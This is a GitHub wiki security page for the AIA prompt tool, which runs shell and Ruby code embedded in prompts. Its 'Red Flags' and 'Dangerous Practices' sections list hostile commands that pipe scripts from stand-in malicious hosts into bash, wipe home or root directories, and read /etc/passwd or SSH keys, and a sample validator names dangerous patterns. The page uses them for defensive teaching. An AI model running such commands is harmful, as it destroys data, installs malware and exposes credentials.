security - MadBomber/aia GitHub Wiki

Security Considerations

AIA's power comes from its ability to execute shell commands, Ruby code, and interact with external tools. This flexibility requires careful attention to security practices.

⚠️ Important Security Warning

AIA executes shell commands and Ruby code embedded in prompts. This provides powerful functionality but requires caution:

  • Review prompts before execution, especially from untrusted sources
  • Avoid storing sensitive data in prompts (API keys, passwords)
  • Use parameterized prompts instead of hardcoding sensitive values
  • Limit file permissions on prompt directories if sharing systems

Shell Command Execution Risks

The Philosophy: "Stupid is as Stupid Does"

AIA follows the philosophy that with great power comes great responsibility. As stated in the project:

"The catchphrase 'the prompt is the code' within AIA means that you have the power to execute any command you want, but you must be careful not to execute commands that could cause harm. AIA is not going to protect you from doing something stupid."

Best Practices for Shell Integration

✅ Safe Practices

# Use parameters for dynamic content
//shell ls -la [DIRECTORY]
//shell git status
//shell find [PROJECT_DIR] -name "*.rb" | head -10

# Use environment variables safely
Current user: $USER
Home directory: $HOME
Current date: $(date)

❌ Dangerous Practices

# Never use destructive commands
//shell rm -rf [DIRECTORY]  # Extremely dangerous!
//shell sudo rm -rf /       # Never do this!

# Avoid commands that could expose sensitive data
//shell cat /etc/passwd
//shell env | grep -i secret

Command Validation

When creating tools that execute shell commands, always validate inputs:

def execute(command:)
  # Validate command doesn't contain dangerous patterns
  dangerous_patterns = ['rm -rf', 'sudo', 'chmod 777', '> /dev/', 'dd if=']
  
  if dangerous_patterns.any? { |pattern| command.include?(pattern) }
    return { error: "Command contains potentially dangerous operations" }
  end
  
  # Proceed with execution
  `#{command}`
end

Sensitive Data Protection

Parameterized Configuration

Never hardcode sensitive information in prompts:

# ✅ Good: Use parameters
//config api_key = [API_KEY]
//config database_url = [DATABASE_URL]

# ❌ Bad: Hardcode secrets
//config api_key = sk-1234567890abcdef
//config database_url = postgresql://user:password@host/db

Environment Variable Guidelines

# ✅ Safe environment variables
export AIA_MODEL=gpt-4o-mini
export AIA_PROMPTS_DIR=~/my-prompts
export AIA_VERBOSE=true

# ❌ Never put secrets in environment variables for AIA
export AIA_API_KEY=secret_key  # Don't do this

Configuration File Security

Protect configuration files containing sensitive data:

# Set restrictive permissions on config files
chmod 600 ~/.aia/config.yml

# Don't include secrets in main config - use parameters instead

File System Security

Prompt Directory Permissions

Set appropriate permissions on your prompts directory:

# Restrictive permissions for private prompts
chmod 700 ~/.prompts
chmod 600 ~/.prompts/*.txt

# For shared prompts, use a separate directory
mkdir ~/shared-prompts
chmod 755 ~/shared-prompts
chmod 644 ~/shared-prompts/*.txt

Tool File Security

When developing custom tools:

def execute(file_path:)
  # Validate file path to prevent directory traversal
  unless file_path.match?(/\A[\w\-\/\.]+\z/)
    return { error: "Invalid file path characters" }
  end
  
  # Prevent access to sensitive system files
  forbidden_paths = ['/etc/', '/var/', '/sys/', '/proc/']
  if forbidden_paths.any? { |path| file_path.start_with?(path) }
    return { error: "Access to system directories is forbidden" }
  end
  
  # Check if file exists and is readable
  unless File.readable?(file_path)
    return { error: "File not found or not readable" }
  end
  
  File.read(file_path)
end

Tool Security

Custom Tool Development

When creating RubyLLM::Tool implementations:

class SecureFileTool < RubyLLM::Tool
  description "Securely read files with validation"
  param :file_path, desc: "Path to file (must be in allowed directories)"
  
  ALLOWED_DIRECTORIES = [
    ENV['HOME'],
    '/tmp',
    Dir.pwd
  ].compact.freeze
  
  def execute(file_path:)
    # Resolve full path to prevent relative path attacks
    full_path = File.expand_path(file_path)
    
    # Check if file is in allowed directories
    unless ALLOWED_DIRECTORIES.any? { |dir| full_path.start_with?(File.expand_path(dir)) }
      return { error: "File access restricted to allowed directories" }
    end
    
    # Additional validations...
    File.read(full_path)
  rescue => e
    { error: "Error reading file: #{e.message}" }
  end
end

Tool Filtering

Use tool filtering to limit available functionality:

# Only allow specific safe tools
aia --chat --tools shared --allowed_tools read_file,write_file

# Exclude potentially dangerous tools
aia --chat --tools ~/my-tools --rejected_tools admin,system,network

Prompt Review Guidelines

Before Running Untrusted Prompts

  1. Read the entire prompt file - including comments and directives
  2. Check for shell commands - look for //shell, $(...), and environment variables
  3. Review Ruby code - examine //ruby directives and ERB blocks
  4. Validate file inclusions - check //include directives for sensitive files
  5. Inspect configuration changes - review //config directives

Red Flags to Watch For

# Suspicious shell commands
//shell curl http://malicious-site.com/script.sh | bash
//shell wget -O - evil.com/malware | sh
//shell rm -rf $HOME
//shell chmod 777 /

# Dangerous Ruby code
//ruby system('rm -rf /')
//ruby File.delete('/important/file')
//ruby `curl malicious-site.com | bash`

# Sensitive file access
//include /etc/passwd
//include ~/.ssh/id_rsa
//shell cat ~/.env | grep -i secret

Network Security

API Key Management

# ✅ Secure API key handling
echo "Enter your OpenAI API key:"
read -s OPENAI_API_KEY
export OPENAI_API_KEY

# Or use a secure credential manager
aia --chat --config api_key=[API_KEY_FROM_VAULT]

Tool Network Access

Limit network access in custom tools:

def execute(url:)
  # Validate URL to prevent SSRF attacks
  uri = URI.parse(url)
  
  # Block internal/localhost addresses
  if ['localhost', '127.0.0.1', '0.0.0.0'].include?(uri.host) ||
     uri.host&.match?(/^192\.168\./) ||
     uri.host&.match?(/^10\./) ||
     uri.host&.match?(/^172\.(1[6-9]|2\d|3[01])\./)
    return { error: "Access to internal addresses is forbidden" }
  end
  
  # Proceed with external request
  Net::HTTP.get(uri)
end

Multi-User Environment Security

Shared System Considerations

# Create user-specific prompts directories
export AIA_PROMPTS_DIR=/home/$USER/.prompts
mkdir -p $AIA_PROMPTS_DIR
chmod 700 $AIA_PROMPTS_DIR

# Avoid global prompt directories
# Don't use: export AIA_PROMPTS_DIR=/usr/share/prompts

Process Isolation

# Run AIA with limited privileges when possible
# Consider using containers or sandboxing for untrusted prompts

# Example with Docker (if available)
docker run -it --rm \
  -v $HOME/.prompts:/prompts:ro \
  -e AIA_PROMPTS_DIR=/prompts \
  ruby:3.2 aia my_prompt

Incident Response

If You Suspect Compromise

  1. Stop AIA immediately - Ctrl+C or kill the process
  2. Review recent prompts - Check ~/.prompts/_prompts.log
  3. Check system for changes - Review file modifications, new processes
  4. Audit shell history - Look for unexpected commands
  5. Review network connections - Check for suspicious outbound traffic

Log Review

# Check AIA's log file for suspicious activity
tail -100 ~/.prompts/_prompts.log

# Review shell history for unexpected commands
history | grep -E "(rm|curl|wget|chmod|sudo)" | tail -20

# Check for new or modified files
find $HOME -newer ~/.prompts/_prompts.log -type f

Security Checklist

Before Using AIA

  • Set appropriate file permissions on prompts directory
  • Configure environment variables securely
  • Understand the risks of shell integration
  • Review any shared or downloaded prompts

Regular Security Practices

  • Regularly audit your prompts directory
  • Review and clean up old prompts
  • Monitor AIA's log file for unusual activity
  • Keep AIA and its dependencies updated
  • Use version control for important prompts

When Sharing Prompts

  • Remove any sensitive information
  • Add clear warnings about shell commands
  • Test prompts in isolated environments first
  • Provide clear documentation about what the prompt does

Conclusion

AIA's power comes with responsibility. By following these security practices, you can safely harness AIA's capabilities while protecting your systems and data. Remember: always review prompts before execution, especially from untrusted sources.

The key principle is: trust but verify. AIA gives you the tools to do amazing things, but it's up to you to use them safely.